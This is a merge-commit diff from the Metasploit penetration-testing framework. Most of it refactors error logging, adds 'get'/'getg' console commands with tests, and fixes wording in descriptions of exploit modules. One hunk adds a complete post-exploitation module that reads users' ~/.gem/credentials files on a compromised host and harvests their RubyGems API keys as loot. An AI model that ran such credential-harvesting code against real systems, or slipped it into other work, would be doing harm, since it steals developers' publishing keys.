Merge remote-tracking branch 'upstream/master' into bug/4634/blank-username
Conflicts: lib/msf/ui/console/command_dispatcher/db.rb spec/lib/msf/ui/console/command_dispatcher/db_spec.rbbug/bundler_fix
commit
eac7b11a87
|
@ -19,6 +19,8 @@ Feature: Help command
|
|||
connect Communicate with a host
|
||||
edit Edit the current module with $VISUAL or $EDITOR
|
||||
exit Exit the console
|
||||
get Gets the value of a variable
|
||||
getg Gets the value of a global variable
|
||||
go_pro Launch Metasploit web GUI
|
||||
grep Grep the output of another command
|
||||
help Help menu
|
||||
|
|
|
@ -151,19 +151,17 @@ protected
|
|||
rescue ::Exception => e
|
||||
mod.error = e
|
||||
mod.print_error("Auxiliary failed: #{e.class} #{e}")
|
||||
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
if(e.class.to_s != 'Msf::OptionValidateError')
|
||||
mod.print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple.auxiliary.rb/
|
||||
mod.print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
|
||||
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
|
||||
|
||||
mod.cleanup
|
||||
|
||||
return
|
||||
|
@ -184,3 +182,4 @@ end
|
|||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -147,17 +147,7 @@ module Exploit
|
|||
exploit.error = e
|
||||
exploit.print_error("Exploit failed: #{e}")
|
||||
elog("Exploit failed (#{exploit.refname}): #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
exploit.print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple.exploit.rb/
|
||||
exploit.print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
end
|
||||
|
||||
return driver.session if driver
|
||||
|
@ -209,3 +199,4 @@ end
|
|||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -121,19 +121,17 @@ protected
|
|||
rescue ::Exception => e
|
||||
mod.error = e
|
||||
mod.print_error("Post failed: #{e.class} #{e}")
|
||||
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
if(e.class.to_s != 'Msf::OptionValidateError')
|
||||
mod.print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple.post.rb/
|
||||
mod.print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
|
||||
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
|
||||
|
||||
mod.cleanup
|
||||
|
||||
return
|
||||
|
@ -156,3 +154,4 @@ end
|
|||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -271,20 +271,14 @@ protected
|
|||
exploit.fail_reason = Msf::Exploit::Failure::Unknown
|
||||
end
|
||||
|
||||
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
|
||||
|
||||
if exploit.fail_reason == Msf::Exploit::Failure::Unknown
|
||||
exploit.print_error("Exploit failed: #{msg}")
|
||||
exploit.print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.core.exploit_driver.rb/
|
||||
exploit.print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
|
||||
else
|
||||
exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
end
|
||||
|
||||
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
end
|
||||
|
||||
# Record the error to various places
|
||||
|
@ -335,3 +329,4 @@ protected
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -15,6 +15,11 @@ class RPC_Core < RPC_Base
|
|||
self.service.stop
|
||||
end
|
||||
|
||||
def rpc_getg(var)
|
||||
val = framework.datastore[var]
|
||||
{ var.to_s => val.to_s }
|
||||
end
|
||||
|
||||
def rpc_setg(var, val)
|
||||
framework.datastore[var] = val
|
||||
{ "result" => "success" }
|
||||
|
|
|
@ -120,17 +120,12 @@ class Auxiliary
|
|||
print_error("Auxiliary interrupted by the console user")
|
||||
rescue ::Exception => e
|
||||
print_error("Auxiliary failed: #{e.class} #{e}")
|
||||
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
if(e.class.to_s != 'Msf::OptionValidateError')
|
||||
print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple/
|
||||
print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
|
||||
return false
|
||||
|
@ -157,3 +152,4 @@ class Auxiliary
|
|||
end
|
||||
|
||||
end end end end
|
||||
|
||||
|
|
|
@ -115,6 +115,8 @@ class Core
|
|||
"color" => "Toggle color",
|
||||
"exit" => "Exit the console",
|
||||
"edit" => "Edit the current module with $VISUAL or $EDITOR",
|
||||
"get" => "Gets the value of a variable",
|
||||
"getg" => "Gets the value of a global variable",
|
||||
"go_pro" => "Launch Metasploit web GUI",
|
||||
"grep" => "Grep the output of another command",
|
||||
"help" => "Help menu",
|
||||
|
@ -2298,6 +2300,81 @@ class Core
|
|||
return tabs
|
||||
end
|
||||
|
||||
def cmd_get_help
|
||||
print_line "Usage: get var1 [var2 ...]"
|
||||
print_line
|
||||
print_line "The get command is used to get the value of one or more variables."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Gets a value if it's been set.
|
||||
#
|
||||
def cmd_get(*args)
|
||||
|
||||
# Figure out if these are global variables
|
||||
global = false
|
||||
|
||||
if (args[0] == '-g')
|
||||
args.shift
|
||||
global = true
|
||||
end
|
||||
|
||||
# No arguments? No cookie.
|
||||
if args.empty?
|
||||
global ? cmd_getg_help : cmd_get_help
|
||||
return false
|
||||
end
|
||||
|
||||
# Determine which data store we're operating on
|
||||
if (active_module && !global)
|
||||
datastore = active_module.datastore
|
||||
else
|
||||
datastore = framework.datastore
|
||||
end
|
||||
|
||||
args.each { |var| print_line("#{var} => #{datastore[var]}") }
|
||||
end
|
||||
|
||||
#
|
||||
# Tab completion for the get command
|
||||
#
|
||||
# @param str [String] the string currently being typed before tab was hit
|
||||
# @param words [Array<String>] the previously completed words on the command line. words is always
|
||||
# at least 1 when tab completion has reached this stage since the command itself has been completed
|
||||
|
||||
def cmd_get_tabs(str, words)
|
||||
datastore = active_module ? active_module.datastore : self.framework.datastore
|
||||
datastore.keys
|
||||
end
|
||||
|
||||
def cmd_getg_help
|
||||
print_line "Usage: getg var1 [var2 ...]"
|
||||
print_line
|
||||
print_line "Exactly like get -g, get global variables"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Gets variables in the global data store.
|
||||
#
|
||||
def cmd_getg(*args)
|
||||
args.unshift('-g')
|
||||
|
||||
cmd_get(*args)
|
||||
end
|
||||
|
||||
#
|
||||
# Tab completion for the getg command
|
||||
#
|
||||
# @param str [String] the string currently being typed before tab was hit
|
||||
# @param words [Array<String>] the previously completed words on the command line. words is always
|
||||
# at least 1 when tab completion has reached this stage since the command itself has been completed
|
||||
|
||||
def cmd_getg_tabs(str, words)
|
||||
self.framework.datastore.keys
|
||||
end
|
||||
|
||||
def cmd_unset_help
|
||||
print_line "Usage: unset [-g] var1 var2 var3 ..."
|
||||
print_line
|
||||
|
|
|
@ -887,6 +887,16 @@ class Db
|
|||
|
||||
query.find_each do |core|
|
||||
|
||||
# Exclude non-blank username creds if that's what we're after
|
||||
if user && user.empty? && !(core.public && core.public.username.blank?)
|
||||
next
|
||||
end
|
||||
|
||||
# Exclude non-blank password creds if that's what we're after
|
||||
if pass && pass.empty? && !(core.private && core.private.data.blank?)
|
||||
next
|
||||
end
|
||||
|
||||
if core.logins.empty?
|
||||
|
||||
tbl << [
|
||||
|
|
|
@ -121,18 +121,12 @@ class Exploit
|
|||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
|
||||
|
||||
elog("Exploit exception (#{mod.refname}): #{e.class} #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
if(e.class.to_s != 'Msf::OptionValidateError')
|
||||
print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple/
|
||||
print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -122,18 +122,12 @@ class Post
|
|||
print_error("Post interrupted by the console user")
|
||||
rescue ::Exception => e
|
||||
print_error("Post failed: #{e.class} #{e}")
|
||||
|
||||
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
|
||||
|
||||
if e.kind_of?(Msf::OptionValidateError)
|
||||
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
|
||||
else
|
||||
if (e.class.to_s != 'Msf::OptionValidateError')
|
||||
print_error("Call stack:")
|
||||
e.backtrace.each do |line|
|
||||
break if line =~ /lib.msf.base.simple/
|
||||
print_error(" #{line}")
|
||||
end
|
||||
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
|
||||
end
|
||||
|
||||
return false
|
||||
|
@ -160,3 +154,4 @@ class Post
|
|||
end
|
||||
|
||||
end end end end
|
||||
|
||||
|
|
|
@ -55,16 +55,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits an un-authenticated information disclosure vulnerability in Huawei
|
||||
This module exploits an unauthenticated information disclosure vulnerability in Huawei
|
||||
SOHO routers. The module will gather information by accessing the /api pages where
|
||||
authentication is not required, allowing configuration changes as well as information
|
||||
disclosure including any stored SMS.
|
||||
disclosure, including any stored SMS.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jimson K James.',
|
||||
'<tomsmaily[at]aczire.com>', # Msf module
|
||||
'Jimson K James',
|
||||
'Tom James <tomsmaily[at]aczire.com>', # Msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
end
|
||||
|
||||
#Gather basic router information
|
||||
# Gather basic router information
|
||||
def run
|
||||
get_router_info
|
||||
print_line('')
|
||||
|
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => '/api/wlan/basic-settings',
|
||||
})
|
||||
|
||||
#check whether we got any response from server and proceed.
|
||||
# check whether we got any response from server and proceed.
|
||||
unless is_target?(res)
|
||||
return nil
|
||||
end
|
||||
|
@ -273,19 +273,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def is_target?(res)
|
||||
#check whether we got any response from server and proceed.
|
||||
# check whether we got any response from server and proceed.
|
||||
unless res
|
||||
print_error("#{peer} - Failed to get any response from server")
|
||||
return false
|
||||
end
|
||||
|
||||
#Is it a HTTP OK
|
||||
# Is it a HTTP OK
|
||||
unless res.code == 200
|
||||
print_error("#{peer} - Did not get HTTP 200, URL was not found")
|
||||
return false
|
||||
end
|
||||
|
||||
#Check to verify server reported is a Huawei router
|
||||
# Check to verify server reported is a Huawei router
|
||||
unless res.headers['Server'].match(/IPWEBS\/1.4.0/i)
|
||||
print_error("#{peer} - Target doesn't seem to be a Huawei router")
|
||||
return false
|
||||
|
|
|
@ -14,10 +14,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Konica Minolta Password Extractor',
|
||||
'Description' => %q(
|
||||
'Description' => %q{
|
||||
This module will extract FTP and SMB account usernames and passwords
|
||||
from Konica Minolta mfp devices. Tested models include: C224, C280,
|
||||
283, C353, C360, 363, 420, C452,C452, C452, C454e, C554 ),
|
||||
from Konica Minolta multifunction printer (MFP) devices. Tested models include
|
||||
C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Deral "Percentx" Heiland',
|
||||
|
|
|
@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
off of the filesystem. This properties file contains an encrypted password that is set during
|
||||
installation. What is interesting about this password is that it is set as the same password
|
||||
as the database 'sa' user and of the admin user created during installation. This password
|
||||
is encrypted with a static key, and is encrypted using a weak cipher at that (ECB). By default,
|
||||
if installed with a local SQL Server instance, the SQL server is listening on all interfaces.
|
||||
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
|
||||
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
|
||||
|
||||
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
|
||||
user in order to achieve remote command execution with permissions of the database process. If
|
||||
the administrator has no changed the password for the initially created account since installation,
|
||||
the attacker also now has the password for this account. By default, 'admin' is recommended.
|
||||
the administrator has not changed the password for the initially created account since installation,
|
||||
the attacker will have the password for this account. By default, 'admin' is recommended.
|
||||
|
||||
Any user account can be used to exploit this, all that is needed is a pair of credentials.
|
||||
Any user account can be used to exploit this, all that is needed is a valid credential.
|
||||
|
||||
The most data that can be successfully retrieved is 255 characters due to length restrictions
|
||||
on the field used to perform the XXE attack.
|
||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'Misfortune Cookie' vulnerability which affects Allegro Software
|
||||
Rompager versions before 4.34 and can allow attackers to authenticate
|
||||
to the HTTP service as an administrator without providing valid
|
||||
credentials, however more specifics are not yet known.
|
||||
credentials.
|
||||
),
|
||||
'Author' => [
|
||||
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
|
||||
(CDM) 10 does not properly implement access control, which allows remote attackers to
|
||||
modify user information. This module exploits the vulnerability for configure unauthorized
|
||||
modify user information. This module exploits the vulnerability to configure unauthorized
|
||||
call forwarding.
|
||||
},
|
||||
'Author' => 'fozavci',
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
|
||||
(CDM), before version 10, doesn't implement access control properly, which allows remote
|
||||
attackers to modify user information. This module exploits the vulnerability to make
|
||||
unauthorized speeddial manipulations.
|
||||
unauthorized speeddial entity manipulations.
|
||||
},
|
||||
'Author' => 'fozavci',
|
||||
'References' =>
|
||||
|
|
|
@ -20,11 +20,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'Description' => %q{
|
||||
This module steals the user password of an administrative user on a desktop Linux system
|
||||
when it is entered for unlocking the screen or for doing administrative actions using
|
||||
policykit. Then it escalates to root privileges using sudo and the stolen user password.
|
||||
PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.
|
||||
It exploits the design weakness that there is no trusted channel for transferring the
|
||||
password from the keyboard to the actual password verificatition against the shadow file
|
||||
(which is running as root since /etc/shadow is only readable to the root user). Both
|
||||
screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
|
||||
screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under
|
||||
the current user account to query for the password and then pass it to a setuid-root binary
|
||||
to do the password verification. Therefore, it is possible to inject a password stealer
|
||||
after compromising the user account. Since sudo requires only the user password (and not
|
||||
|
|
|
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
|
||||
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
|
||||
the upload does not handle correctly '../' sequences, which can be abused to write
|
||||
in the file system. Authentication is needed to exploit this vulnerability, but this module
|
||||
to the file system. Authentication is needed to exploit this vulnerability, but this module
|
||||
will attempt to login using the default credentials for the administrator and guest
|
||||
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
|
||||
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
|
||||
accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.
|
||||
For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All
|
||||
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
|
||||
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
|
||||
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
|
||||
|
|
|
@ -13,9 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
|
||||
'Name' => "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
|
||||
This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as
|
||||
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
|
||||
upload which allows a user to upload arbitrary files to the '/images/' directory.
|
||||
|
||||
|
|
|
@ -15,17 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(
|
||||
info,
|
||||
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
|
||||
'Description' => %q{WP Symposium Plugin for WordPress contains a
|
||||
flaw that allows a remote attacker to execute
|
||||
arbitrary PHP code. This flaw exists because the
|
||||
/wp-symposium/server/file_upload_form.php script
|
||||
does not properly verify or sanitize
|
||||
user-uploaded files. By uploading a .php file,
|
||||
the remote system will place the file in a
|
||||
user-accessible path. Making a direct request to
|
||||
the uploaded file will allow the attacker to
|
||||
execute the script with the privileges of the
|
||||
web server.},
|
||||
'Description' => %q{
|
||||
WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker
|
||||
to execute arbitrary PHP code. This flaw exists because the
|
||||
/wp-symposium/server/file_upload_form.php script does not properly verify or
|
||||
sanitize user-uploaded files. By uploading a .php file, the remote system will
|
||||
place the file in a user-accessible path. Making a direct request to the
|
||||
uploaded file will allow the attacker to execute the script with the privileges
|
||||
of the web server.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
|
||||
overly long HTTP response header.
|
||||
|
||||
By persuading the victim to download a file from a malicious server, a
|
||||
remote attacker could execute arbitrary code on the system or cause
|
||||
the application to crash. This module has been tested successfully on
|
||||
|
|
|
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
BulletProof FTP Client 2010, caused by an overly long hostname.
|
||||
|
||||
By persuading the victim to open a specially-crafted .BPS file, a
|
||||
remote attacker could execute arbitrary code on the system or cause
|
||||
the application to crash. This module has been tested successfully on
|
||||
|
|
|
@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
i-Ftp v2.20, caused by a long time value set for scheduled download.
|
||||
|
||||
By persuading the victim to place a specially-crafted Schedule.xml file
|
||||
in the i-FTP folder, a remote attacker could execute arbitrary code on
|
||||
the system or cause the application to crash. This module has been
|
||||
|
|
|
@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
|
||||
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
|
||||
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.
|
||||
A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated
|
||||
attacker to upload arbitrary files, including arbitrary JSP code. This module has been
|
||||
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
|
||||
},
|
||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
specifically against Windows MySQL servers. This module abuses the FILE
|
||||
privilege to write a payload to Microsoft's All Users Start Up directory
|
||||
which will execute every time a user logs in. The default All Users Start
|
||||
Up directory used by the module is Windows 7 friendly.
|
||||
Up directory used by the module is present on Windows 7.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Description' => 'Listen for a connection. First, the port will need to be knocked from
|
||||
the IP defined in KHOST. This IP will work as an authentication method
|
||||
(you can spoof it with tools like hping). After that you could get your
|
||||
shellcode from any IP. The socket will appear as "closed" helping us to
|
||||
shellcode from any IP. The socket will appear as "closed," thus helping to
|
||||
hide the shellcode',
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -21,7 +21,7 @@ module Metasploit3
|
|||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Hidden Bind TCP Stager',
|
||||
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host',
|
||||
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host.',
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', # original payload module (stager bind_tcp)
|
||||
|
|
|
@ -0,0 +1,67 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'yaml'
|
||||
|
||||
class Metasploit4 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Unix
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Multi Gather RubyGems API Key',
|
||||
'Description' => %q{
|
||||
This module obtains a user's RubyGems API key from ~/.gem/credentials.
|
||||
},
|
||||
'Author' => [
|
||||
'Jonathan Claudius <jclaudius[at]trustwave.com>',
|
||||
'Brandon Myers <bmyers[at]trustwave.com>'
|
||||
],
|
||||
'Platform' => %w{bsd linux osx unix},
|
||||
'SessionTypes' => %w{shell},
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
end
|
||||
|
||||
def run
|
||||
print_status('Finding ~/.gem/credentials')
|
||||
paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
|
||||
paths = paths.select { |f| file?(f) }
|
||||
|
||||
if paths.empty?
|
||||
print_error('No users found with a ~/.gem/credentials file')
|
||||
return
|
||||
end
|
||||
|
||||
download_key(paths)
|
||||
end
|
||||
|
||||
def download_key(paths)
|
||||
print_status("Looting #{paths.count} files")
|
||||
paths.each do |path|
|
||||
path.chomp!
|
||||
next if ['.', '..'].include?(path)
|
||||
|
||||
rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
|
||||
next unless rubygems_api_key
|
||||
|
||||
print_good("Found a RubyGems API key: #{rubygems_api_key}")
|
||||
|
||||
loot_path = store_loot(
|
||||
'rubygems.apikey',
|
||||
'text/plain',
|
||||
session,
|
||||
rubygems_api_key,
|
||||
'rubygems_api_key.txt',
|
||||
'RubyGems API key'
|
||||
)
|
||||
|
||||
print_good("RubyGems API key stored in #{loot_path}")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,28 @@
|
|||
# -*- coding:binary -*-
|
||||
require 'spec_helper'
|
||||
|
||||
require 'msf/core/rpc/v10/rpc_base'
|
||||
require 'msf/core/rpc/v10/rpc_core'
|
||||
require 'msf/core/rpc/v10/service'
|
||||
|
||||
describe Msf::RPC::RPC_Core do
|
||||
include_context 'Msf::Simple::Framework'
|
||||
|
||||
let(:service) do
|
||||
Msf::RPC::Service.new(framework)
|
||||
end
|
||||
|
||||
let(:core) do
|
||||
Msf::RPC::RPC_Core.new(service)
|
||||
end
|
||||
|
||||
describe '#rpc_getg' do
|
||||
it 'should show an empty value if the variable is unset' do
|
||||
expect(core.rpc_getg('FOO')).to eq({'FOO' => ''})
|
||||
end
|
||||
it 'should show the correct value if the variable is set' do
|
||||
core.rpc_setg('FOO', 'BAR')
|
||||
expect(core.rpc_getg('FOO')).to eq({'FOO' => 'BAR'})
|
||||
end
|
||||
end
|
||||
end
|
|
@ -95,4 +95,72 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
it { is_expected.to respond_to :cmd_get }
|
||||
it { is_expected.to respond_to :cmd_getg }
|
||||
|
||||
def set_and_test_variable(name, framework_value, module_value, framework_re, module_re)
|
||||
# set the current module
|
||||
allow(core).to receive(:active_module).and_return(mod)
|
||||
# always assume set variables validate (largely irrelevant because ours are random)
|
||||
allow(driver).to receive(:on_variable_set).and_return(true)
|
||||
# the specified global value
|
||||
core.cmd_setg(name, framework_value) if framework_value
|
||||
# set the specified local value
|
||||
core.cmd_set(name, module_value) if module_value
|
||||
|
||||
# test the global value if specified
|
||||
if framework_re
|
||||
@output = []
|
||||
core.cmd_getg(name)
|
||||
@output.join.should =~ framework_re
|
||||
end
|
||||
|
||||
# test the local value if specified
|
||||
if module_re
|
||||
@output = []
|
||||
core.cmd_get(name)
|
||||
@output.join.should =~ module_re
|
||||
end
|
||||
end
|
||||
|
||||
describe "#cmd_get and #cmd_getg" do
|
||||
describe "without arguments" do
|
||||
it "should show the correct help message" do
|
||||
core.cmd_get
|
||||
@output.join.should =~ /Usage: get /
|
||||
@output = []
|
||||
core.cmd_getg
|
||||
@output.join.should =~ /Usage: getg /
|
||||
end
|
||||
end
|
||||
|
||||
describe "with arguments" do
|
||||
let(:name) { ::Rex::Text.rand_text_alpha(10).upcase }
|
||||
|
||||
context "with an active module" do
|
||||
let(:mod) do
|
||||
mod = ::Msf::Module.new
|
||||
mod.send(:initialize, {})
|
||||
mod
|
||||
end
|
||||
|
||||
it "should show no value if not set in the framework or module" do
|
||||
set_and_test_variable(name, nil, nil, /^#{name} => $/, /^#{name} => $/)
|
||||
end
|
||||
|
||||
it "should show the correct value when only the module has this variable" do
|
||||
set_and_test_variable(name, nil, 'MODULE', /^#{name} => $/, /^#{name} => MODULE$/)
|
||||
end
|
||||
|
||||
it "should show the correct value when only the framework has this variable" do
|
||||
set_and_test_variable(name, 'FRAMEWORK', nil, /^#{name} => FRAMEWORK$/, /^#{name} => $/)
|
||||
end
|
||||
|
||||
it "should show the correct value when both the module and the framework have this variable" do
|
||||
set_and_test_variable(name, 'FRAMEWORK', 'MODULE', /^#{name} => FRAMEWORK$/, /^#{name} => MODULE$/)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -65,8 +65,134 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
|
|||
it { is_expected.to respond_to :set_rhosts_from_addrs }
|
||||
|
||||
describe "#cmd_creds" do
|
||||
let(:username) { "username" }
|
||||
let(:password) { "password" }
|
||||
let(:username) { "thisuser" }
|
||||
let(:password) { "thispass" }
|
||||
|
||||
describe "-u" do
|
||||
let(:nomatch_username) { "thatuser" }
|
||||
let(:nomatch_password) { "thatpass" }
|
||||
let(:blank_username) { "" }
|
||||
let(:blank_password) { "" }
|
||||
let(:nonblank_username) { "nonblank_user" }
|
||||
let(:nonblank_password) { "nonblank_pass" }
|
||||
before(:each) do
|
||||
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
|
||||
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
|
||||
core = FactoryGirl.create(:metasploit_credential_core,
|
||||
origin: FactoryGirl.create(:metasploit_credential_origin_import),
|
||||
private: priv,
|
||||
public: pub,
|
||||
realm: nil,
|
||||
workspace: framework.db.workspace)
|
||||
nonblank_priv = FactoryGirl.create(:metasploit_credential_password, data: nonblank_password)
|
||||
blank_pub = FactoryGirl.create(:metasploit_credential_blank_username)
|
||||
core = FactoryGirl.create(:metasploit_credential_core,
|
||||
origin: FactoryGirl.create(:metasploit_credential_origin_import),
|
||||
private: nonblank_priv,
|
||||
public: blank_pub,
|
||||
realm: nil,
|
||||
workspace: framework.db.workspace)
|
||||
nonblank_pub = FactoryGirl.create(:metasploit_credential_username, username: nonblank_username)
|
||||
